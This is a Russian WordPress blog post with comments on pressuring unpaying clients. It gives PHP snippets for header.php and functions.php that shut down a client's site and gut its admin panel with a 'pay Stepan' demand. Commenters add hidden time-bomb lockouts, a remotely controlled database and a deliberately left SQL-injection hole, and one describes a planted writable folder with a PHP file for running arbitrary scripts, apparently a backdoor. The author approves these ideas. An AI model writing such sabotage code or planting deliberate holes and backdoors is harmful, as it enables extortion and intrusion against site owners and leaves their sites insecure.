BloGGood.ru

Блог Костаневича Степана

До Нового Года осталось:

Блог на разные темы, seo-оптимизация, раскрутка сайта, создание сайта, вкусные эффекты для сайта и многое другое…

Главная » Вебмастеру » Как заставить заказчика оплатить работу?

Как заставить заказчика оплатить работу?

2016-04-22 / Вр:23:41 / просмотров: 4458

Как заставить заказчика оплатить работу?

Что делать с горе-заказчиками, которые резко куда-то пропадают, когда нужно оплатить за выполненную работу? За плечами у меня уже есть некий опыт работы по созданию сайтов, приходилось работать с разными людьми: совестными и не очень. Совестными я называю тех, кто понимает, что всякий труд должен быть достойно оплачен, они и предоплату не бояться внести, тем самым заинтересовывая и поощряя веб-мастера. А «не очень» - это те, которые после работы (которая часто стоила веб-мастеру и ночных недосыпаний и прочих нервотрепок) резко куда-то исчезают и не оплачивают работу.

Расскажу маленькую историю.
Мой отец был печником. Так вот, бывали такие товарищи, которые вовсе не товарищи, после окончания работы отказывались платить. У многих печников были разные, своего рода, штучки, которые могут заставить хозяина заплатить. Между кирпичей, отец вставлял куриное яйцо. Если хозяин отказывался платить, это яйцо пробивалось и через какое-то время из-за вони в доме находиться было не возможно. Естественно, хозяину приходилось снова обращаться к печнику (моему отцу), выяснять проблему и расплачиваться за свое нахальство.

В чем же здесь мораль? У каждого, кто делает работу под чей-то заказ, должны быть свои фишки, чтобы защитить себя от нехороших заказчиков-халявщиков.

Вот мой список действий, чтобы максимально себя защитить:

- беру всегда предоплату;
- никогда не покупаю хостинг и домен за свои деньги. Меня не устраивает такой разговор: «Вы купите за свои и включите в общую стоимость» - нет, товарищи, за работу отдельно, за хостинг и домен отдельно! В таком случае, даже если вас и кинут, вы не останетесь в минусе!
-  никогда не даю пароли заказчику раньше времени, а только после того, как все работы на сайты закончены и заказчик все оплатил. Согласитесь – на такой ноте приятней заканчивать сотрудничество.

Все эти три правила эффективны, но в моей практике были случаи, когда заказчик все-равно пропадал, думая, что он ничего не теряет.
И тут моя изобретательность находит еще один способ привести в чувство обнаглевшего заказчика! Если сайт сделан на WordPress, то можно сделать следующее:

Откройте файл «Заголовок (header.php)» и в самом верху установите вот такой код:

<?php
exit("Сайт временно недоступен. Заплатите за работу Степану!");
?>

Сайт временно недоступен. Заплатите за работу Степану! – данный текст можете поменять на свой.

В результате вместо красивого сайта заказчик увидит:

Как заставить заказчика оплатить работу?

Можно еще напакостить с админкой. Откройте файл «functions.php» и сразу после знака «<?» вставьте вот такой код:

function wph_new_toolbar() {
global $wp_admin_bar;
$wp_admin_bar->remove_menu('comments');
$wp_admin_bar->remove_menu('my-account');
$wp_admin_bar->remove_menu('edit');
$wp_admin_bar->remove_menu('new-content');
$wp_admin_bar->remove_menu('updates');
$wp_admin_bar->remove_menu('wp-logo');
$wp_admin_bar->remove_menu('site-name');

}
add_action('wp_before_admin_bar_render', 'wph_new_toolbar');
add_filter('show_admin_bar', '__return_false');
add_filter('show_admin_bar', '__return_false');
add_action('admin_head', 'kill_adminmenu');
function kill_adminmenu(){
echo "<style ENGINE='text/css'>#wpadminbar{display:none!important;} </style>";
}

function remove_menus_bloggood_ru(){
remove_menu_page( 'index.php' );
remove_menu_page( 'edit.php' );
remove_menu_page( 'upload.php' );
remove_menu_page( 'edit.php?post_type=page' );
remove_menu_page( 'edit-comments.php' );
remove_menu_page( 'themes.php' );
remove_menu_page( 'plugins.php' );
remove_menu_page( 'users.php' );
remove_menu_page( 'tools.php' );
remove_menu_page( 'options-general.php' );
}
add_action( 'admin_menu', 'remove_menus_bloggood_ru' );

add_action('wp_dashboard_setup', 'my_blogood_ru_help_widgets');

function my_blogood_ru_help_widgets() {
global $wp_meta_boxes;

wp_add_dashboard_widget(
'blogood_ru_help_widget', //Слагвиджета
'Поддержка сайта', //Заголовок виджета
'blogood_ru_help' //Функция вывода
);
}

function blogood_ru_help() {
echo '<p>Заплатите за сайт Степану! </p>';
}

Строка №47 – «Заплатите за сайт Степану!» вставляете ваш текст.

Заказчик только зайдет в админ-панель и увидит чудо:

Как заставить заказчика оплатить работу?

Все меню исчезло и только надпись «Заплатите за сайт Степану».  Вот папандосик! :shock: Прям, как в фильмах ужасов. Это имя будет преследовать его до тех пор, пока не заплатит.:razz:

Прошу прощения, если кого-то мои методы напугали и теперь я в ваших глазах – бессердечная редиска. Но вы должны понимать, что на крайние меры я иду в очень редких случаях. И, если по-прежнему осуждаете меня, то мне очень интересно, как вы боритесь с такими заказчиками? Пишите в комментариях. Спасибо!

Понравился пост? Помоги другим узнать об этой статье, кликни на кнопку социальных сетей ↓↓↓

Получай обновления блога!!! Подпишись:

Популярные статьи:

17 Ответов на комментарий - Как заставить заказчика оплатить работу?

  1. Александр

    Здравствуйте Степан. Спасибо за хороший пост. У меня был инцидент с попыткой “кинуть” меня с деньгами, но я сделал так. В файле .htaccess просто убрал

    </IfModule>

    :grin:

  2. inna

    Я тоже считаю, что должны быть меры против непорядочности. только по жизни именно программисты не дают спокойно жить людям своими хитростями (ставят их внутри самой проги) – вынуждают платить сверх выплаченного. Но это думаю не про Вас, но порядочных среди вас очень мало.

  3. Тамара Полякова

    Привет Степан, спасибо тебе за этот пост! И, я думаю, не надо извиняться! Ты все делаешь правильно! Ты умничка!

  4. Интересный подход, но думаю не во всех случаях прокатит, так как к файлам свободный доступ через фтп и обнаружив вот такую надпись в файле клиент может пойти с этим кодом на форум, ну и соответственно заработает сайт. Я бы скорее вынес код в отдельный файл и спрятал его во всей куче вордпресса, помимо конечно папки которая обновляется, ну и соответственно подключил его там где мне нужно, или подключил в одном месте а вывод надписи сделал в другом, в этом случае клиенту пришлось бы перерыть кучу файлов и понять что к чему и в итоге опять к тебе, мол плачу угаворил. :idea:
    А так вообще можно создать файл с кодом плюс некоторые данные занести в бд, сделать типа счетчика, что к примеру, админка заблокируется через определенное время и тогда придется клиенту учить ПХП чтоб понять что к чему и откуда ноги, а это время нервы и силы, соответственно ити на форум со всей кучей файлов от вордпресс нет смысла, так как никто бесплатно не поможет. В итоге придется писать тебе, а тут придется ему и долг отдать тебе и пусть платит сверху за устранение данной штуки, а тебе что, просто поменял данные в бд или еще там где или за чего поставил блок и все. Я к тому что, пусть скупой платит дважды.
    Но если в данном случае будут читать мой коммент заказчики, то скажу сразу что это я образно написал где что можно сделать и как исправить, в данном случае если будет сделано грамотно, то заказчик уж точно ничего не найдет в коде подозрительного и придется кусать локти или как выше в посте написано “Заплатите за сайт Степану!”, короче идем к Степану и платим за труды.
    А то некоторые самые умные и думают что они умнее и круче поросячего хвостика, но если все же так думают, то получат проблемы или даже если и не заплатят, то рано или поздно их так же кинут такие же умные как и они. :smokes:

  5. seo

    Ствол к виску и вопрос решен))

  6. Степан => автор блога Степан => автор блога

    Здравствуйте, Александр! Неплохой метод и быстрый метод.
    Можно еще в файле “Функции темы (functions.php)” убрать знак “

  7. Степан => автор блога Степан => автор блога

    Здравствуйте, Инна! У Вас такой случай был?
    Если Вы имеет виду те программы за которые нужно платить, а мы их скачиваем бесплатно и попадаете на вирусы, то я думаю мы в этом сами виноваты.
    Да, я согласен, это злит, когда приходиться пол интернета облазить, чтобы найти бесплатную программу и без бяки.
    Спасибо, Инна, за комментарий!

  8. Степан => автор блога Степан => автор блога

    Здравствуйте, Тамар! Спасибо за комментарий!

  9. Степан => автор блога Степан => автор блога

    Спасибо, Александр, за коммент! Интересная идея “сделать типа счетчика”. У меня дополнение. Сайт блокировался по дате или по дням. То есть, включался код, который блокировал бы весь сайт с надписью “Заплатите за сайт”. Например, в понедельник, среда, пятница – сайт работает, а в остальные дни, заказчик видит надпись об оплате.

  10. Степан => автор блога Степан => автор блога

    :grin: А если он из другой страны?

  11. Инна а почему вы решили что именно программисты не дают спокойно жить людям своими хитростями?
    Я считаю что в данном случае сказано не правильно, Степан же не говорит что все заказчики плохие, и вообще не стоит делить так как вы. В любом деле и в любом месте есть порядочные люди и есть непорядочные и кстати, есть поговорка такая: “В семье не без урода”. А если вы наткнулись на плохого программиста или на несколько плохих это не говорит что все делают так, просто или вам не повезло или опыта нет по работе с людьми онлайн.

  12. Можно и такое сделать, а можно вообще сделать так что при заходе юсера на сайт клиента ему через каждые 1-3 минуты будет всплывать модальное окно с надписью Типа плати а то капут сайту или этот хозяин сайта не добросовесный и так далее. При этом код окна написать на чистом CSS и в отдельный файл, код ПХП в отдельный, а подгружать окно через скрипт, можно даже через аякс, и если сделать так, то в исходном коде не будет видно код модального окна и при просмотре кода через браузер тоже не будет видно этого кода и короче негодяй зайдет в тупик конкретный, типа что от куда берется если кода то нет, может даже покавыряет свой комп на вирусы, но дело то не в вирусах, а в том что решил надурить и не заплотить

  13. Степан => автор блога Степан => автор блога

    О! Эта идея вообще классная! Мне понравилось!

  14. Аякс сильная штука. Я вот на сайте клиента вывожу курс валют, написал скрипт который парсит нужные мне данные о
    курсе валют и конвертирует. Вывожу курс валют на сайте через аякс так как курс валют постоянно менятся и мне его нужно обновлять автоматом. Так вот я о чем, что если просмотреть исходный код страницы сайта где выводится курс валют, ты не увидишь кода валют вообще, хотя на сайте он отображается.

  15. Drval

    Любые изменения в коде отслеживаются на раз-два. Тем быстрее, чем больше опыта.
    Намучено в .htaccess? Так это сразу видно по некорректному поведению сайта – сайт либо лупит ошибку доступа, либо перенаправляет куда-то не туда.

    Всплывающая фигня? Скачивается весь сайт на комп, открывается любой файловый менеджер и ищется, где в файлах сидит, кусочек выдаваемого на странице кода. (Не, можно конечно выдаваемый код растасовать посимвольно по огромному количеству переменных и распихать по куче файлов, а потом наваять “простынь”, собирающую эти куски, но это титанический труд.) А дальше дело техники – где запрашивается этот файл.

    Подключение в одном месте, вывод в другом? Все находится довольно быстро аналогично предыдущему способу.

    Ajax, CSS? Да, визуально не видно, что что-то откуда-то загружается. А консоль браузера на что?

    Все таймеры, индикация, надоедания – это все ерунда, которую можно ставить, надеясь только на порядочность коллег, что, увидев такое сообщение, никто не возьмется за восстановление сайта.

    Самый действенный – это не отдавать код вообще, пока не получите оплату. Никаких чужих хостингов, никаких “А давайте…”. Разработка на вашем сервере/хостинге/локалхосте. Показываем, получаем деньги, устанавливаем на устройство заказчика.

    Но если уж так хочется поиграться в хацкера, то подкину вам пару простеньких, но интересных идей. :oops:

    1. Закидываем на “боевой” сервер только файлы, а БД подключаем с того, к которому у нас есть доступ (наш хостинг должен поддерживать возможность удаленного подключения к БД). На “боевом” БД нету вообще.
    Понятно, что в любой момент мы запрещаем удаленный доступ к БД и фсе.

    2. Оставляем в каком-то запросе к БД возможность для SQL-инъекции.
    Эти дыры довольно тяжело отлавливаются и они могут довольно долго гарантировать вам возможность напакостить. ))

    Ну и такой себе “кувалдный метод”.
    3. создаем где-то глубоко папку с правами 644 (все чинно благородно) и владельцем apache или nginx (или от какого там имени вебсервер шарится по папкам) и ложим в нее файлик .php с содержимым

    Думаю, что несложно догадаться, что теперь мы можем в любой момент на сервере создать скрипт любого содержания.

    Есть еще много “интересного”, но и так уже много лишнего написал. )))

  16. Drval

    “в исходном коде не будет видно код модального окна и при просмотре кода через браузер тоже не будет видно этого кода”

    Разочарую Вас, Александр, но все, что приходит к нам от сервера, видно.

    Выделяем мышкой кусочек “невидимого” текста смотрим исходный код выделенного фрагмента.

    Даже, если запретить выделение мышкой, то ctrl+A, F12 в консоли все покажет.

    Плюс все аяксовые приблуды просекаются на-раз простым отключением поддержки JS в браузере.

  17. Степан => автор блога Степан => автор блога

    Спасибо за идею! Я думаю читателям было полезно прочитать такой комент.

Добавить комментарий

;-) :| :x :twisted: :smokes: :smile: :shock: :sad: :rose: :roll: :razz: :pop-corne: :oops: :o :mrgreen: :lol: :idea: :grin: :gazeta: :evil: :cry: :cool: :coffe: :arrow: :???: :?: :!:

Чтобы добавить в комментарий код HTML, PHP, CSS, JavaScript, нужно сделать так: [code] ваш код [/code]

Метки:

Мои цели на 2018-2019:

1). Закончить тему «Bootstrap»

2). Закончить тему «Все про PHP и MySQL»

3). Создать портфолио и мини интернет-магазин шаблонов

4). Довести количество статей до 800

5). Добиться посещаемости 3000 человек/сутки

6). Увеличить число подписчиков до 250

Статистика по блогу

Количество записей на блоге: 802
Количество страниц на блоге: 20
Количество рубрик на блоге: 28
Количество меток на блоге: 72
Количество комментариев на блоге: 4573